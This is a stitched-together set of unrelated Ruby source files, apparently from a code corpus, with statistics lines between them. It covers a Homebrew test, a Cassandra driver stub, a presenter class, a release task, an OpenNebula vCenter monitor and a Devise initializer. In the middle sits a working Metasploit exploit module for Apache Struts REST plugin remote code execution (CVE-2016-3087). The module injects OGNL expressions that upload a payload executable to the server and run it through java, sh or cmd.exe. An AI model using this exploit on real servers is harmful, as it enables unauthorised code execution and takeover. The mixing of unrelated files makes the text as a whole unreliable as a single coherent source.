output = shell_output("#{bin}/jose jwe dec -i msg.jwe -k rsa.jwk 2>&1")
assert_equal "hi", output.chomp
output = shell_output("#{bin}/jose jwe dec -i msg.jwe -k oct.jwk 2>&1", 1)
assert_equal "Unwrapping failed!", output.chomp
end
end
| 40.604651 | 94 | 0.683849 |
0859b4239de2dedb4d27b23a4bf998b34cc58721 | 810 | # encoding: utf-8
#--
# Copyright 2013-2014 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#++
require 'cassandra/cluster/schema/replication_strategies/simple'
require 'cassandra/cluster/schema/replication_strategies/network_topology'
require 'cassandra/cluster/schema/replication_strategies/none'
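# These classes are typically looked up from a keyspace's replication
# class name. A sketch of that dispatch (illustrative only, not the
# driver's actual code):
#
# def strategy_for(replication_class)
#   case replication_class
#   when /SimpleStrategy\z/          then Schema::ReplicationStrategies::Simple.new
#   when /NetworkTopologyStrategy\z/ then Schema::ReplicationStrategies::NetworkTopology.new
#   else                                  Schema::ReplicationStrategies::None.new
#   end
# end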
| 36.818182 | 74 | 0.783951 |
7adf4c05b25ad239ec8947be36c185cc2786aca5 | 6,291 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache Struts
version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code
Execution can be performed when using REST Plugin with ! operator when
Dynamic Method Invocation is enabled.
},
'Author' => [
'Nixawk' # original metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-3087' ],
[ 'URL', 'https://www.seebug.org/vuldb/ssvid-91741' ]
],
'Platform' => %w{ java linux win },
'Privileged' => true,
'Targets' =>
[
['Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
]
],
'DisclosureDate' => 'Jun 01 2016',
'DefaultTarget' => 2))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-rest-showcase/orders/3/']),
OptString.new('TMPPATH', [ false, 'Overwrite the temp path for the file upload. Needed if the home directory is not writable.', nil])
], self.class)
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def get_target_platform
target.platform.platforms.first
end
def temp_path
@TMPPATH ||= lambda {
path = datastore['TMPPATH']
return nil unless path
case get_target_platform
when Msf::Module::Platform::Windows
slash = '\\'
else
slash = '/'
end
unless path.end_with?(slash)
path << slash
end
return path
}.call
end
def send_http_request(payload, params_hash)
uri = normalize_uri(datastore['TARGETURI'])
uri = "#{uri}/#{payload}"
resp = send_request_cgi(
'uri' => uri,
'version' => '1.1',
'method' => 'POST',
'vars_post' => params_hash
)
if resp && resp.code == 404
fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
end
resp
end
def generate_rce_payload(code)
payload = ""
payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS")
payload << ","
payload << Rex::Text.uri_encode(code)
payload << ","
payload << Rex::Text.uri_encode("#xx.toString.json")
payload << "?"
payload << Rex::Text.uri_encode("#xx:#request.toString")
payload
end
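# For orientation, the assembled (pre-encoding) payload has this shape --
# three comma-separated OGNL expressions plus a `?key:value` suffix that
# the REST plugin evaluates via dynamic method invocation:
#
#   #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS , <code> ,
#   #xx.toString.json ? #xx:#request.toString
#
# (spacing added for readability; the whole string is URI-encoded and
# appended to TARGETURI by send_http_request)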
def upload_exec(cmd, filename, content)
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
var_c = rand_text_alpha_lower(4)
var_d = rand_text_alpha_lower(4)
var_e = rand_text_alpha_lower(4)
var_f = rand_text_alpha_lower(4)
code = "##{var_a}=new sun.misc.BASE64Decoder(),"
code << "##{var_b}=new java.io.FileOutputStream(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_e}[0]))),"
code << "##{var_b}.write(new java.math.BigInteger(#parameters.#{var_f}[0], 16).toByteArray()),##{var_b}.close(),"
code << "##{var_c}=new java.io.File(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_e}[0]))),##{var_c}.setExecutable(true),"
code << "@java.lang.Runtime@getRuntime().exec(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_d}[0])))"
payload = generate_rce_payload(code)
params_hash = {
var_d => Rex::Text.encode_base64(cmd),
var_e => Rex::Text.encode_base64(filename),
var_f => content
}
send_http_request(payload, params_hash)
end
def check
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
flag = Rex::Text.rand_text_alpha(5)
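# e.g. with addends 12 and 34 and flag 'abcde', a vulnerable target
# evaluates the injected OGNL and echoes 'abcde46abcde' in the response body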
code = "##{var_a}[email protected]@getResponse().getWriter(),"
code << "##{var_a}.print(#parameters.#{var_b}[0]),"
code << "##{var_a}.print(new java.lang.Integer(#{addend_one}+#{addend_two})),"
code << "##{var_a}.print(#parameters.#{var_b}[0]),"
code << "##{var_a}.close()"
payload = generate_rce_payload(code)
params_hash = { var_b => flag }
begin
resp = send_http_request(payload, params_hash)
rescue Msf::Exploit::Failed
return Exploit::CheckCode::Unknown
end
if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}")
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
payload_exe = rand_text_alphanumeric(4 + rand(4))
case target['Platform']
when 'java'
payload_exe = "#{temp_path}#{payload_exe}.jar"
pl_exe = payload.encoded_jar.pack
command = "java -jar #{payload_exe}"
when 'linux'
path = datastore['TMPPATH'] || '/tmp/'
pl_exe = generate_payload_exe
payload_exe = "#{path}#{payload_exe}"
command = "/bin/sh -c #{payload_exe}"
when 'win'
path = temp_path || '.\\'
pl_exe = generate_payload_exe
payload_exe = "#{path}#{payload_exe}.exe"
command = "cmd.exe /c #{payload_exe}"
else
fail_with(Failure::NoTarget, 'Unsupported target platform!')
end
pl_content = pl_exe.unpack('H*').join()
print_status("Uploading exploit to #{payload_exe}, and executing it.")
upload_exec(command, payload_exe, pl_content)
handler
end
end
| 30.687805 | 142 | 0.595772 |
21210560dfb0fc14c97296e7a4b2ef983c29d1a6 | 237 | class StaffMemberFormPresenter < UserFormPresenter
def suspended_check_box
markup(:div, class: "check-boxes") do |m|
m << check_box(:suspended)
m << label(:suspended, "Account suspended")
end
end
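# Illustrative output sketch (markup, check_box and label are inherited
# helpers; the exact HTML they emit is assumed, not verified):
#
# presenter.suspended_check_box
# # => '<div class="check-boxes"><input type="checkbox" ...><label ...>Account suspended</label></div>'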
end | 29.625 | 50 | 0.611814 |
5d3ab603e0a0ee4b2db921c3bf486b0f4b623077 | 1,690 | # frozen_string_literal: true
module ReleaseTools
module Tasks
module AutoDeploy
class Prepare
include ::SemanticLogger::Loggable
def execute
check_version
prepare_monthly_release
results = create_branches
notify_results(results)
end
def prepare_monthly_release
logger.info('Preparing the monthly release issue', version: version)
Release::Prepare.new(version).execute
end
def create_branches
logger.info('Creating the auto-deploy branches', branch: branch)
ReleaseTools::Services::AutoDeployBranchService
.new(branch)
.create_branches!
end
def notify_results(results)
logger.info('Notifying the operation results on slack')
ReleaseTools::Slack::AutoDeployNotification.on_create(results)
end
def auto_deploy_naming
@auto_deploy_naming ||= ReleaseTools::AutoDeploy::Naming.new
end
def branch
@branch ||= auto_deploy_naming.branch
end
def version
auto_deploy_naming.version
end
# Validates if the active version can be retrieved.
#
# A valid version is a hard requirement for this task,
# in case it cannot be retrieved we should fail the task
# with a meaningful error message
#
# @raise [RuntimeError] if `version` is nil
def check_version
return unless version.nil?
logger.fatal('Cannot detect the active version')
raise 'Cannot detect the active version'
end
end
end
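# Typical invocation from a scheduled release task (sketch):
#
# ReleaseTools::Tasks::AutoDeploy::Prepare.new.execute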
end
end
| 26 | 78 | 0.619527 |
3970fa39c0c1a018e340a4699fbd190c0041ff6f | 17,061 | # -------------------------------------------------------------------------- #
# Copyright 2002-2019, OpenNebula Project, OpenNebula Systems #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); you may #
# not use this file except in compliance with the License. You may obtain #
# a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#--------------------------------------------------------------------------- #
module VirtualMachineMonitor
POLL_ATTRIBUTE = OpenNebula::VirtualMachine::Driver::POLL_ATTRIBUTE
VM_STATE = OpenNebula::VirtualMachine::Driver::VM_STATE
# Converts the VI string state to OpenNebula state convention
# Guest states are:
# - poweredOff The virtual machine is currently powered off.
# - poweredOn The virtual machine is currently powered on.
# - suspended The virtual machine is currently suspended.
def state_to_c(state)
case state
when 'poweredOn'
VM_STATE[:active]
when 'suspended'
VM_STATE[:paused]
when 'poweredOff'
VM_STATE[:deleted]
else
VM_STATE[:unknown]
end
end
# monitor function used when VMM poll action is called
# rubocop:disable Naming/VariableName
# rubocop:disable Style/FormatStringToken
def monitor_poll_vm
reset_monitor
return unless get_vm_id
@state = state_to_c(self['summary.runtime.powerState'])
if @state != OpenNebula::VirtualMachine::Driver::VM_STATE[:active]
reset_monitor
return
end
cpuMhz = self['runtime.host.summary.hardware.cpuMhz'].to_f
@monitor[:used_memory] = self['summary.quickStats.hostMemoryUsage'] *
1024
used_cpu = self['summary.quickStats.overallCpuUsage'].to_f / cpuMhz
used_cpu = (used_cpu * 100).to_s
@monitor[:used_cpu] = format('%.2f', used_cpu).to_s
# Check for negative values
@monitor[:used_memory] = 0 if @monitor[:used_memory].to_i < 0
@monitor[:used_cpu] = 0 if @monitor[:used_cpu].to_i < 0
guest_ip_addresses = []
unless self['guest.net'].empty?
self['guest.net'].each do |net|
next unless net.ipConfig
next if net.ipConfig.ipAddress.empty?
net.ipConfig.ipAddress.each do |ip|
guest_ip_addresses << ip.ipAddress
end
end
end
@guest_ip_addresses = guest_ip_addresses.join(',')
pm = self['_connection'].serviceInstance.content.perfManager
provider = pm.provider_summary(@item)
refresh_rate = provider.refreshRate
stats = {}
if one_item['MONITORING/LAST_MON'] &&
one_item['MONITORING/LAST_MON'].to_i != 0
# Real time data stores max 1 hour. 1 minute has 3 samples
interval = (Time.now.to_i -
one_item['MONITORING/LAST_MON'].to_i)
# If last poll was more than hour ago get 3 minutes,
# else calculate how many samples since last poll
if interval > 3600
samples = 9
else
samples = (interval / refresh_rate) + 1
end
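# e.g. polling 10 minutes after the previous sample, with the 20s
# realtime refresh rate: (600 / 20) + 1 = 31 samples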
max_samples = samples > 0 ? samples : 1
stats = pm.retrieve_stats(
[@item],
['net.transmitted', 'net.bytesRx', 'net.bytesTx',
'net.received', 'virtualDisk.numberReadAveraged',
'virtualDisk.numberWriteAveraged', 'virtualDisk.read',
'virtualDisk.write'],
interval: refresh_rate, max_samples: max_samples
) rescue {}
else
# First poll, get at least latest 3 minutes = 9 samples
stats = pm.retrieve_stats(
[@item],
['net.transmitted', 'net.bytesRx', 'net.bytesTx',
'net.received', 'virtualDisk.numberReadAveraged',
'virtualDisk.numberWriteAveraged', 'virtualDisk.read',
'virtualDisk.write'],
interval: refresh_rate, max_samples: 9
) rescue {}
end
if !stats.empty? && !stats.first[1][:metrics].empty?
metrics = stats.first[1][:metrics]
nettx_kbpersec = 0
if metrics['net.transmitted']
metrics['net.transmitted'].each do |sample|
nettx_kbpersec += sample if sample > 0
end
end
netrx_kbpersec = 0
if metrics['net.bytesRx']
metrics['net.bytesRx'].each do |sample|
netrx_kbpersec += sample if sample > 0
end
end
read_kbpersec = 0
if metrics['virtualDisk.read']
metrics['virtualDisk.read'].each do |sample|
read_kbpersec += sample if sample > 0
end
end
read_iops = 0
if metrics['virtualDisk.numberReadAveraged']
metrics['virtualDisk.numberReadAveraged'].each do |sample|
read_iops += sample if sample > 0
end
end
write_kbpersec = 0
if metrics['virtualDisk.write']
metrics['virtualDisk.write'].each do |sample|
write_kbpersec += sample if sample > 0
end
end
write_iops = 0
if metrics['virtualDisk.numberWriteAveraged']
metrics['virtualDisk.numberWriteAveraged'].each do |sample|
write_iops += sample if sample > 0
end
end
else
nettx_kbpersec = 0
netrx_kbpersec = 0
read_kbpersec = 0
read_iops = 0
write_kbpersec = 0
write_iops = 0
end
# Accumulate values if present
if @one_item && @one_item['MONITORING/NETTX']
previous_nettx = @one_item['MONITORING/NETTX'].to_i
else
previous_nettx = 0
end
if @one_item && @one_item['MONITORING/NETRX']
previous_netrx = @one_item['MONITORING/NETRX'].to_i
else
previous_netrx = 0
end
if @one_item && @one_item['MONITORING/DISKRDIOPS']
previous_diskrdiops = @one_item['MONITORING/DISKRDIOPS'].to_i
else
previous_diskrdiops = 0
end
if @one_item && @one_item['MONITORING/DISKWRIOPS']
previous_diskwriops = @one_item['MONITORING/DISKWRIOPS'].to_i
else
previous_diskwriops = 0
end
if @one_item && @one_item['MONITORING/DISKRDBYTES']
previous_diskrdbytes = @one_item['MONITORING/DISKRDBYTES'].to_i
else
previous_diskrdbytes = 0
end
if @one_item && @one_item['MONITORING/DISKWRBYTES']
previous_diskwrbytes = @one_item['MONITORING/DISKWRBYTES'].to_i
else
previous_diskwrbytes = 0
end
@monitor[:nettx] = previous_nettx +
(nettx_kbpersec * 1024 * refresh_rate).to_i
@monitor[:netrx] = previous_netrx +
(netrx_kbpersec * 1024 * refresh_rate).to_i
@monitor[:diskrdiops] = previous_diskrdiops + read_iops
@monitor[:diskwriops] = previous_diskwriops + write_iops
@monitor[:diskrdbytes] = previous_diskrdbytes +
(read_kbpersec * 1024 * refresh_rate).to_i
@monitor[:diskwrbytes] = previous_diskwrbytes +
(write_kbpersec * 1024 * refresh_rate).to_i
end
# monitor function used when poll action is called for all vms
def monitor(stats)
reset_monitor
refresh_rate = 20 # 20 seconds between samples (realtime)
@state = state_to_c(@vm_info['summary.runtime.powerState'])
return if @state != VM_STATE[:active]
cpuMhz = @vm_info[:esx_host_cpu]
@monitor[:used_memory] = @vm_info['summary.quickStats.hostMemoryUsage']
.to_i * 1024
used_cpu = @vm_info['summary.quickStats.overallCpuUsage'].to_f / cpuMhz
used_cpu = (used_cpu * 100).to_s
@monitor[:used_cpu] = format('%.2f', used_cpu).to_s
# Check for negative values
@monitor[:used_memory] = 0 if @monitor[:used_memory].to_i < 0
@monitor[:used_cpu] = 0 if @monitor[:used_cpu].to_i < 0
guest_ip_addresses = []
unless @vm_info['guest.net'].empty?
@vm_info['guest.net'].each do |net|
next unless net.ipConfig
next if net.ipConfig.ipAddress.empty?
net.ipConfig.ipAddress.each do |ip|
guest_ip_addresses << ip.ipAddress
end
end
end
@guest_ip_addresses = guest_ip_addresses.join(',')
if stats.key?(@item)
metrics = stats[@item][:metrics]
nettx_kbpersec = 0
if metrics['net.transmitted']
metrics['net.transmitted'].each do |sample|
nettx_kbpersec += sample if sample > 0
end
end
netrx_kbpersec = 0
if metrics['net.bytesRx']
metrics['net.bytesRx'].each do |sample|
netrx_kbpersec += sample if sample > 0
end
end
read_kbpersec = 0
if metrics['virtualDisk.read']
metrics['virtualDisk.read'].each do |sample|
read_kbpersec += sample if sample > 0
end
end
read_iops = 0
if metrics['virtualDisk.numberReadAveraged']
metrics['virtualDisk.numberReadAveraged'].each do |sample|
read_iops += sample if sample > 0
end
end
write_kbpersec = 0
if metrics['virtualDisk.write']
metrics['virtualDisk.write'].each do |sample|
write_kbpersec += sample if sample > 0
end
end
write_iops = 0
if metrics['virtualDisk.numberWriteAveraged']
metrics['virtualDisk.numberWriteAveraged'].each do |sample|
write_iops += sample if sample > 0
end
end
else
nettx_kbpersec = 0
netrx_kbpersec = 0
read_kbpersec = 0
read_iops = 0
write_kbpersec = 0
write_iops = 0
end
# Accumulate values if present
if @one_item && @one_item['MONITORING/NETTX']
previous_nettx = @one_item['MONITORING/NETTX'].to_i
else
previous_nettx = 0
end
if @one_item && @one_item['MONITORING/NETRX']
previous_netrx = @one_item['MONITORING/NETRX'].to_i
else
previous_netrx = 0
end
if @one_item && @one_item['MONITORING/DISKRDIOPS']
previous_diskrdiops = @one_item['MONITORING/DISKRDIOPS'].to_i
else
previous_diskrdiops = 0
end
if @one_item && @one_item['MONITORING/DISKWRIOPS']
previous_diskwriops = @one_item['MONITORING/DISKWRIOPS'].to_i
else
previous_diskwriops = 0
end
if @one_item && @one_item['MONITORING/DISKRDBYTES']
previous_diskrdbytes = @one_item['MONITORING/DISKRDBYTES'].to_i
else
previous_diskrdbytes = 0
end
if @one_item && @one_item['MONITORING/DISKWRBYTES']
previous_diskwrbytes = @one_item['MONITORING/DISKWRBYTES'].to_i
else
previous_diskwrbytes = 0
end
@monitor[:nettx] = previous_nettx +
(nettx_kbpersec * 1024 * refresh_rate).to_i
@monitor[:netrx] = previous_netrx +
(netrx_kbpersec * 1024 * refresh_rate).to_i
@monitor[:diskrdiops] = previous_diskrdiops + read_iops
@monitor[:diskwriops] = previous_diskwriops + write_iops
@monitor[:diskrdbytes] = previous_diskrdbytes +
(read_kbpersec * 1024 * refresh_rate).to_i
@monitor[:diskwrbytes] = previous_diskwrbytes +
(write_kbpersec * 1024 * refresh_rate).to_i
end
# rubocop:enable Naming/VariableName
# rubocop:enable Style/FormatStringToken
# Generates a OpenNebula IM Driver valid string with the monitor info
def info
return 'STATE=d' if @state == 'd'
if @vm_info
guest_ip = @vm_info['guest.ipAddress']
else
guest_ip = self['guest.ipAddress']
end
used_cpu = @monitor[:used_cpu]
used_memory = @monitor[:used_memory]
netrx = @monitor[:netrx]
nettx = @monitor[:nettx]
diskrdbytes = @monitor[:diskrdbytes]
diskwrbytes = @monitor[:diskwrbytes]
diskrdiops = @monitor[:diskrdiops]
diskwriops = @monitor[:diskwriops]
if @vm_info
esx_host = @vm_info[:esx_host_name].to_s
else
esx_host = self['runtime.host.name'].to_s
end
if @vm_info
guest_state = @vm_info['guest.guestState'].to_s
else
guest_state = self['guest.guestState'].to_s
end
if @vm_info
vmware_tools = @vm_info['guest.toolsRunningStatus'].to_s
else
vmware_tools = self['guest.toolsRunningStatus'].to_s
end
if @vm_info
vmtools_ver = @vm_info['guest.toolsVersion'].to_s
else
vmtools_ver = self['guest.toolsVersion'].to_s
end
if @vm_info
vmtools_verst = @vm_info['guest.toolsVersionStatus2'].to_s
else
vmtools_verst = self['guest.toolsVersionStatus2'].to_s
end
if @vm_info
rp_name = @vm_info[:rp_list]
.select do |item|
item[:ref] == @vm_info['resourcePool']._ref
end
.first[:name] rescue ''
rp_name = 'Resources' if rp_name.empty?
else
rp_name = self['resourcePool'].name
end
str_info = ''
str_info = 'GUEST_IP=' << guest_ip.to_s << ' ' if guest_ip
if @guest_ip_addresses && !@guest_ip_addresses.empty?
str_info << 'GUEST_IP_ADDRESSES="' << @guest_ip_addresses.to_s \
<< '" '
end
str_info << "#{POLL_ATTRIBUTE[:state]}=" << @state << ' '
str_info << "#{POLL_ATTRIBUTE[:cpu]}=" << used_cpu.to_s << ' '
str_info << "#{POLL_ATTRIBUTE[:memory]}=" << used_memory.to_s << ' '
str_info << "#{POLL_ATTRIBUTE[:netrx]}=" << netrx.to_s << ' '
str_info << "#{POLL_ATTRIBUTE[:nettx]}=" << nettx.to_s << ' '
str_info << 'DISKRDBYTES=' << diskrdbytes.to_s << ' '
str_info << 'DISKWRBYTES=' << diskwrbytes.to_s << ' '
str_info << 'DISKRDIOPS=' << diskrdiops.to_s << ' '
str_info << 'DISKWRIOPS=' << diskwriops.to_s << ' '
str_info << 'VCENTER_ESX_HOST="' << esx_host << '" '
str_info << 'VCENTER_GUEST_STATE=' << guest_state << ' '
str_info << 'VCENTER_VMWARETOOLS_RUNNING_STATUS=' << vmware_tools << ' '
str_info << 'VCENTER_VMWARETOOLS_VERSION=' << vmtools_ver << ' '
str_info << 'VCENTER_VMWARETOOLS_VERSION_STATUS=' \
<< vmtools_verst << ' '
str_info << 'VCENTER_RP_NAME="' << rp_name << '" '
end
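# A produced string looks roughly like this (attribute names resolved
# from POLL_ATTRIBUTE; values illustrative):
#
# STATE=a CPU=12.50 MEMORY=524288 NETRX=1024 NETTX=2048 DISKRDBYTES=0
# DISKWRBYTES=0 DISKRDIOPS=0 DISKWRIOPS=0 VCENTER_ESX_HOST="esx-01"
# VCENTER_GUEST_STATE=running VCENTER_RP_NAME="Resources"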
def reset_monitor
@monitor = {
:used_cpu => 0,
:used_memory => 0,
:netrx => 0,
:nettx => 0,
:diskrdbytes => 0,
:diskwrbytes => 0,
:diskrdiops => 0,
:diskwriops => 0
}
end
end
| 35.767296 | 80 | 0.529805 |
e8d45ca55f49abdd4fffb1ea8f7d67607fea7815 | 15,190 | # frozen_string_literal: true
# Assuming you have not yet modified this file, each configuration option below
# is set to its default value. Note that some are commented out while others
# are not: uncommented lines are intended to protect your configuration from
# breaking changes in upgrades (i.e., in the event that future versions of
# Devise change the default values for those options).
#
# Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
# Devise will use the `secret_key_base` as its `secret_key`
# by default. You can change it below and use your own secret key.
# config.secret_key = '594e6c2879591ab9b9e80b1de407b86398c2edb1bfbc4d12ce366b3f6226c501d643403ba626e8a48d3dd9d9abb0e819f8cef92447900dd6a632b2cfdc2cdc3a'
# ==> Controller configuration
# Configure the parent class to the devise controllers.
# config.parent_controller = 'DeviseController'
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# Configure the parent class responsible to send e-mails.
# config.parent_mailer = 'ActionMailer::Base'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [:email]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [:email]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [:email]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication.
# For API-only applications to support authentication "out-of-the-box", you will likely want to
# enable this with :database unless you are using a custom strategy.
# The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If 401 status code should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# When false, Devise will not attempt to reload routes on eager load.
# This can reduce the time taken to boot the app but if your application
# requires the Devise mappings to be loaded during boot time the application
# won't boot properly.
# config.reload_routes = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 12. If
# using other algorithms, it sets how many times you want the password to be hashed.
# The number of stretches used for generating the hashed password are stored
# with the hashed password. This allows you to change the stretches without
# invalidating existing passwords.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# algorithm), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 12
# Set up a pepper to generate the hashed password.
# config.pepper = '303582101f77b817beb3e668c200befea6dd310f17eaa8b47cfc542d61a1d3d53e9b2a350ae8453ae5a033f865785690e886deee864220bcbf58092d95d1980b'
# Send a notification to the original email when the user's email is changed.
# config.send_email_changed_notification = false
# Send a notification email when the user's password is changed.
# config.send_password_change_notification = false
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day.
# You can also set it to nil, which will allow the user to access the website
# without confirming their account.
# Default is 0.days, meaning the user cannot access the website without
# confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
  # If true, requires any email changes to be confirmed (in exactly the same
  # way as initial account confirmation) before being applied. Requires an
  # additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [:email]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 6..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
config.email_regexp = /\A[^@\s]+@[^@\s]+\z/
# ==> Configuration for :timeoutable
  # The time after which an inactive user session times out. Once it
  # elapses, the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [:email]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = true
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [:email]
# Time interval you can reset your password with a reset password key.
  # Don't set too small an interval or your users won't have time to
  # change their passwords.
config.reset_password_within = 6.hours
# When set to false, does not sign a user in automatically after their password is
# reset. Defaults to true, so a user is signed in automatically after a reset.
# config.sign_in_after_reset_password = true
# ==> Configuration for :encryptable
  # Allows you to use another hashing or encryption algorithm besides bcrypt (default).
  # You can use :sha1, :sha512 or algorithms from other authentication tools such as
  # :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20
  # for default behavior) and :restful_authentication_sha1 (then you should set
  # stretches to 10, and copy REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
